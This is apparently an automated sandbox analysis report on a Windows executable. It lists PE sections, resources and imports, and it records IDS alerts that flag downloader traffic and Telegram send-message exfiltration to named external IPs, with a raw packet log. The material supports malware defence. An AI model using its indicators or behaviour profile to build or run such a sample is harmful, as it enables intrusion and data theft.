                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1090000x7594.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0xd40000x349000x34a00f03d2f8c0acd4bc5627e3df8e95886a0False0.8781778874703088data7.774728608518139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x1090000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_ICON0xd44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                RT_ICON0xd45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                RT_ICON0xd48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                RT_ICON0xd49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                RT_ICON0xd58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                RT_ICON0xd61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                RT_ICON0xd66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                RT_ICON0xd8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                RT_ICON0xd9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                RT_STRING0xda1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                RT_STRING0xda6dc0x68adataEnglishGreat Britain0.2735961768219833
                                                                                                                RT_STRING0xdad680x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                RT_STRING0xdb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                RT_STRING0xdb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                RT_STRING0xdbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                RT_STRING0xdc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                RT_RCDATA0xdc4100x2bf97data1.0003386649936985
                                                                                                                RT_GROUP_ICON0x1083a80x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                RT_GROUP_ICON0x1084200x14dataEnglishGreat Britain1.15
                                                                                                                RT_VERSION0x1084340xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                RT_MANIFEST0x1085100x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                                                WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                                                                IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                                                USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                                                UxTheme.dllIsThemeActive
                                                                                                                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                                                USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                                                GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                                                SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                                                Possible Origin

                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishGreat Britain

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2025-01-10T19:10:45.694316+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649710193.122.6.16880TCP
                                                                                                                2025-01-10T19:10:46.897347+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649710193.122.6.16880TCP
                                                                                                                2025-01-10T19:10:47.478879+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649718104.21.16.1443TCP
                                                                                                                2025-01-10T19:10:49.225489+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649719193.122.6.16880TCP
                                                                                                                2025-01-10T19:10:50.491230+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649736193.122.6.16880TCP
                                                                                                                2025-01-10T19:10:51.087271+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649742104.21.16.1443TCP
                                                                                                                2025-01-10T19:10:53.368242+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649760104.21.16.1443TCP
                                                                                                                2025-01-10T19:10:57.116679+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649788104.21.16.1443TCP
                                                                                                                2025-01-10T19:10:59.642439+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649808104.21.16.1443TCP
                                                                                                                2025-01-10T19:11:00.597825+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.649814149.154.167.220443TCP
                                                                                                                2025-01-10T19:11:01.459977+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649820193.122.6.16880TCP
                                                                                                                2025-01-10T19:11:02.319252+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649820193.122.6.16880TCP
                                                                                                                2025-01-10T19:11:02.891207+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649833104.21.16.1443TCP
                                                                                                                2025-01-10T19:11:03.584907+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649838193.122.6.16880TCP
                                                                                                                2025-01-10T19:11:04.124384+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649844104.21.16.1443TCP
                                                                                                                2025-01-10T19:11:07.926395+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649876104.21.16.1443TCP
                                                                                                                2025-01-10T19:11:10.509150+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649896104.21.16.1443TCP
                                                                                                                2025-01-10T19:11:12.687611+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.649913149.154.167.220443TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 10, 2025 19:10:44.580339909 CET4971080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:44.585448027 CET8049710193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:44.585546017 CET4971080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:44.585953951 CET4971080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:44.590842962 CET8049710193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:45.235472918 CET8049710193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:45.287982941 CET4971080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:45.449196100 CET4971080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:45.454108953 CET8049710193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:45.640822887 CET8049710193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:45.694315910 CET4971080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:45.794902086 CET49712443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:45.794960022 CET44349712104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:45.795018911 CET49712443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:45.803798914 CET49712443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:45.803814888 CET44349712104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.288867950 CET44349712104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.288963079 CET49712443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:46.291835070 CET49712443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:46.291846991 CET44349712104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.292294979 CET44349712104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.334917068 CET49712443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:46.344295025 CET49712443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:46.387336969 CET44349712104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.509967089 CET44349712104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.510034084 CET44349712104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.510109901 CET49712443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:46.517086029 CET49712443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:46.520664930 CET4971080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:46.525607109 CET8049710193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.852461100 CET8049710193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.855137110 CET49718443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:46.855169058 CET44349718104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.855225086 CET49718443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:46.855536938 CET49718443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:46.855549097 CET44349718104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:46.897346973 CET4971080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:47.334722042 CET44349718104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:47.352991104 CET49718443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:47.353030920 CET44349718104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:47.478955030 CET44349718104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:47.479104042 CET44349718104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:47.479171991 CET49718443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:47.479526043 CET49718443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:47.483109951 CET4971080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:47.484077930 CET4971980192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:47.488934040 CET8049710193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:47.488969088 CET8049719193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:47.489037037 CET4971080192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:47.489079952 CET4971980192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:47.489238977 CET4971980192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:47.493940115 CET8049719193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:49.170382023 CET8049719193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:49.171622992 CET49735443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:49.171639919 CET44349735104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:49.173386097 CET49735443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:49.173630953 CET49735443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:49.173641920 CET44349735104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:49.225488901 CET4971980192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:49.650799036 CET44349735104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:49.652470112 CET49735443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:49.652519941 CET44349735104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:49.782468081 CET44349735104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:49.782541037 CET44349735104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:49.782608032 CET49735443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:49.783198118 CET49735443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:49.786500931 CET4971980192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:49.787839890 CET4973680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:49.791610003 CET8049719193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:49.791681051 CET4971980192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:49.792674065 CET8049736193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:49.792762041 CET4973680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:49.792860031 CET4973680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:49.797663927 CET8049736193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:50.442044020 CET8049736193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:50.446885109 CET49742443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:50.446928024 CET44349742104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:50.447134972 CET49742443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:50.447220087 CET49742443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:50.447227955 CET44349742104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:50.491230011 CET4973680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:50.927201033 CET44349742104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:50.933598995 CET49742443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:50.933625937 CET44349742104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:51.087301970 CET44349742104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:51.087388992 CET44349742104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:51.087434053 CET49742443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:51.087982893 CET49742443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:51.092453003 CET4974880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:51.097335100 CET8049748193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:51.097429991 CET4974880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:51.097515106 CET4974880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:51.102354050 CET8049748193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:52.732923031 CET8049748193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:52.734277964 CET49760443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:52.734319925 CET44349760104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:52.734386921 CET49760443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:52.734631062 CET49760443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:52.734647989 CET44349760104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:52.772810936 CET4974880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.208986998 CET44349760104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.212184906 CET49760443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:53.212217093 CET44349760104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.368273020 CET44349760104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.368340969 CET44349760104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.368480921 CET49760443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:53.432013988 CET49760443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:53.563040972 CET4974880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.569159985 CET8049748193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.569721937 CET4974880192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.571357012 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.576230049 CET8049766193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:53.577594042 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.577761889 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:53.582488060 CET8049766193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.225126028 CET8049766193.122.6.168192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.226877928 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.226922989 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.226984024 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.227248907 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.227261066 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.272463083 CET4976680192.168.2.6193.122.6.168
                                                                                                                Jan 10, 2025 19:10:54.694957972 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.696918964 CET49772443192.168.2.6104.21.16.1
                                                                                                                Jan 10, 2025 19:10:54.696990013 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.852854967 CET44349772104.21.16.1192.168.2.6
                                                                                                                Jan 10, 2025 19:10:54.852910042 CET44349772104.21.16.1192.168.2.6
